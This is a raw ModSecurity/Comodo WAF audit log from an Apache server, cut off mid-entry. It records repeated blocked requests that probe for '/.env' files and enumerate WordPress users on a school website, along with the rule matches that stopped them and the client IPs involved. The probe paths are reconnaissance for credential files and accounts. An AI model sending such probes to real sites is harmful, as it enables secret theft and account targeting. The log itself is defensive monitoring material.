Intercepted (phase 2) Stopwatch: 1747359515930767 3281 (- - -) Stopwatch2: 1747359515930767 3281; combined=1421, p1=482, p2=907, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1788b7b-Z-- --9ac36f21-A-- [16/May/2025:08:56:58 +0700] aCabase47ocjCGWTS4b4gwAAAEU 103.236.140.4 38212 103.236.140.4 8181 --9ac36f21-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.8.29.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.8.29.105 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9ac36f21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ac36f21-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747360618931542 3428 (- - -) Stopwatch2: 1747360618931542 3428; combined=1467, p1=466, p2=970, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ac36f21-Z-- --a669ba74-A-- [16/May/2025:09:09:43 +0700] aCaeZ9e6THFz1hsaJaKO1AAAAA4 103.236.140.4 38420 103.236.140.4 8181 --a669ba74-B-- GET /.env HTTP/1.0 Referer: https://google.com Host: 103.236.140.4 X-Real-IP: 37.187.139.239 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 37.187.139.239 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0 Safari/537.36 Accept: */* --a669ba74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a669ba74-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747361383118354 679 (- - -) Stopwatch2: 1747361383118354 679; combined=261, p1=227, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a669ba74-Z-- --9c9bfd65-A-- [16/May/2025:09:30:21 +0700] aCajPdhEtho3ciA0wegexwAAAIs 103.236.140.4 38678 103.236.140.4 8181 --9c9bfd65-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 175.117.144.122 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 175.117.144.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9c9bfd65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c9bfd65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747362621909041 3221 (- - -) Stopwatch2: 1747362621909041 3221; combined=1429, p1=508, p2=893, p3=0, p4=0, p5=28, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c9bfd65-Z-- --5802f73c-A-- [16/May/2025:09:37:00 +0700] aCakzMe47ocjCGWTS4b4nAAAAEA 103.236.140.4 38774 103.236.140.4 8181 --5802f73c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 162.214.55.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 162.214.55.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5802f73c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5802f73c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747363020361994 3253 (- - -) Stopwatch2: 1747363020361994 3253; combined=1443, p1=502, p2=908, p3=0, p4=0, p5=32, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5802f73c-Z-- --381bbd55-A-- [16/May/2025:09:45:13 +0700] aCamudhEtho3ciA0wege2AAAAJI 103.236.140.4 38868 103.236.140.4 8181 --381bbd55-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.53.16.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.53.16.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --381bbd55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --381bbd55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747363513829660 3146 (- - -) Stopwatch2: 1747363513829660 3146; combined=1400, p1=465, p2=903, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --381bbd55-Z-- --72971203-A-- [16/May/2025:09:55:10 +0700] aCapDse47ocjCGWTS4b4pwAAAFY 103.236.140.4 38996 103.236.140.4 8181 --72971203-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.74 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --72971203-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72971203-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747364110929960 873 (- - -) Stopwatch2: 1747364110929960 873; combined=390, p1=350, p2=0, p3=0, p4=0, p5=40, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72971203-Z-- --4a1e3304-A-- [16/May/2025:09:55:14 +0700] aCapEse47ocjCGWTS4b4qAAAAFc 103.236.140.4 39000 103.236.140.4 8181 --4a1e3304-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.74 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --4a1e3304-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a1e3304-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747364114152219 832 (- - -) Stopwatch2: 1747364114152219 832; combined=329, p1=290, p2=0, p3=0, p4=0, p5=39, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a1e3304-Z-- --aeb2a708-A-- [16/May/2025:10:01:58 +0700] aCaqpse47ocjCGWTS4b4vQAAAE8 103.236.140.4 39128 103.236.140.4 8181 --aeb2a708-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.74 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --aeb2a708-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aeb2a708-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747364518516626 925 (- - -) Stopwatch2: 1747364518516626 925; combined=331, p1=293, p2=0, p3=0, p4=0, p5=38, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aeb2a708-Z-- --bc12f604-A-- [16/May/2025:10:02:01 +0700] aCaqqce47ocjCGWTS4b4vwAAAFQ 103.236.140.4 39132 103.236.140.4 8181 --bc12f604-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.74 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --bc12f604-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc12f604-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747364521610169 694 (- - -) Stopwatch2: 1747364521610169 694; combined=320, p1=288, p2=0, p3=0, p4=0, p5=32, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc12f604-Z-- --8e12b404-A-- [16/May/2025:10:02:19 +0700] aCaqu9e6THFz1hsaJaKPGwAAAAI 103.236.140.4 39136 103.236.140.4 8181 --8e12b404-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.74 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --8e12b404-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e12b404-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747364539726239 863 (- - -) Stopwatch2: 1747364539726239 863; combined=327, p1=288, p2=0, p3=0, p4=0, p5=39, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e12b404-Z-- --dcd8ac5b-A-- [16/May/2025:10:02:22 +0700] aCaqvse47ocjCGWTS4b4wQAAAFY 103.236.140.4 39140 103.236.140.4 8181 --dcd8ac5b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.74 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --dcd8ac5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dcd8ac5b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747364542571385 696 (- - -) Stopwatch2: 1747364542571385 696; combined=289, p1=260, p2=0, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dcd8ac5b-Z-- --234c6e48-A-- [16/May/2025:10:11:25 +0700] aCas3dhEtho3ciA0wege6QAAAJc 103.236.140.4 39252 103.236.140.4 8181 --234c6e48-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --234c6e48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --234c6e48-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747365085885535 953 (- - -) Stopwatch2: 1747365085885535 953; combined=389, p1=349, p2=0, p3=0, p4=0, p5=39, sr=132, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --234c6e48-Z-- --bc502314-A-- [16/May/2025:10:13:48 +0700] aCatbNhEtho3ciA0wege8QAAAI8 103.236.140.4 39306 103.236.140.4 8181 --bc502314-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --bc502314-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc502314-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747365228574641 768 (- - -) Stopwatch2: 1747365228574641 768; combined=317, p1=281, p2=0, p3=0, p4=0, p5=36, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc502314-Z-- --12716d64-A-- [16/May/2025:10:21:04 +0700] aCavIEE0LfP59mkCzg71XAAAAMA 103.236.140.4 39414 103.236.140.4 8181 --12716d64-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 152.200.143.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.200.143.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --12716d64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12716d64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747365664851044 2965 (- - -) Stopwatch2: 1747365664851044 2965; combined=1282, p1=465, p2=787, p3=0, p4=0, p5=29, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12716d64-Z-- --9f7fc652-A-- [16/May/2025:11:44:54 +0700] aCbCxte6THFz1hsaJaKPiwAAAAg 103.236.140.4 40688 103.236.140.4 8181 --9f7fc652-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --9f7fc652-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f7fc652-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747370694774688 748 (- - -) Stopwatch2: 1747370694774688 748; combined=312, p1=274, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f7fc652-Z-- --c677cb2d-A-- [16/May/2025:11:55:39 +0700] aCbFS0E0LfP59mkCzg715QAAAMA 103.236.140.4 40894 103.236.140.4 8181 --c677cb2d-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 167.99.182.39 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 167.99.182.39 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --c677cb2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c677cb2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747371339065879 884 (- - -) Stopwatch2: 1747371339065879 884; combined=355, p1=310, p2=0, p3=0, p4=0, p5=45, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c677cb2d-Z-- --32131f72-A-- [16/May/2025:12:01:53 +0700] aCbGwdhEtho3ciA0wegfSwAAAJM 103.236.140.4 41002 103.236.140.4 8181 --32131f72-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.5.36.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.5.36.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --32131f72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32131f72-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747371713135804 3258 (- - -) Stopwatch2: 1747371713135804 3258; combined=1369, p1=499, p2=835, p3=0, p4=0, p5=35, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32131f72-Z-- --e49b325c-A-- [16/May/2025:12:04:12 +0700] aCbHTMe47ocjCGWTS4b5QAAAAFU 103.236.140.4 41070 103.236.140.4 8181 --e49b325c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.23.207 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.23.207 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --e49b325c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e49b325c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747371852773128 921 (- - -) Stopwatch2: 1747371852773128 921; combined=433, p1=392, p2=0, p3=0, p4=0, p5=41, sr=154, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e49b325c-Z-- --ba33af1c-A-- [16/May/2025:12:17:05 +0700] aCbKUde6THFz1hsaJaKPrQAAABg 103.236.140.4 41246 103.236.140.4 8181 --ba33af1c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.127.36.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.127.36.190 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ba33af1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba33af1c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: 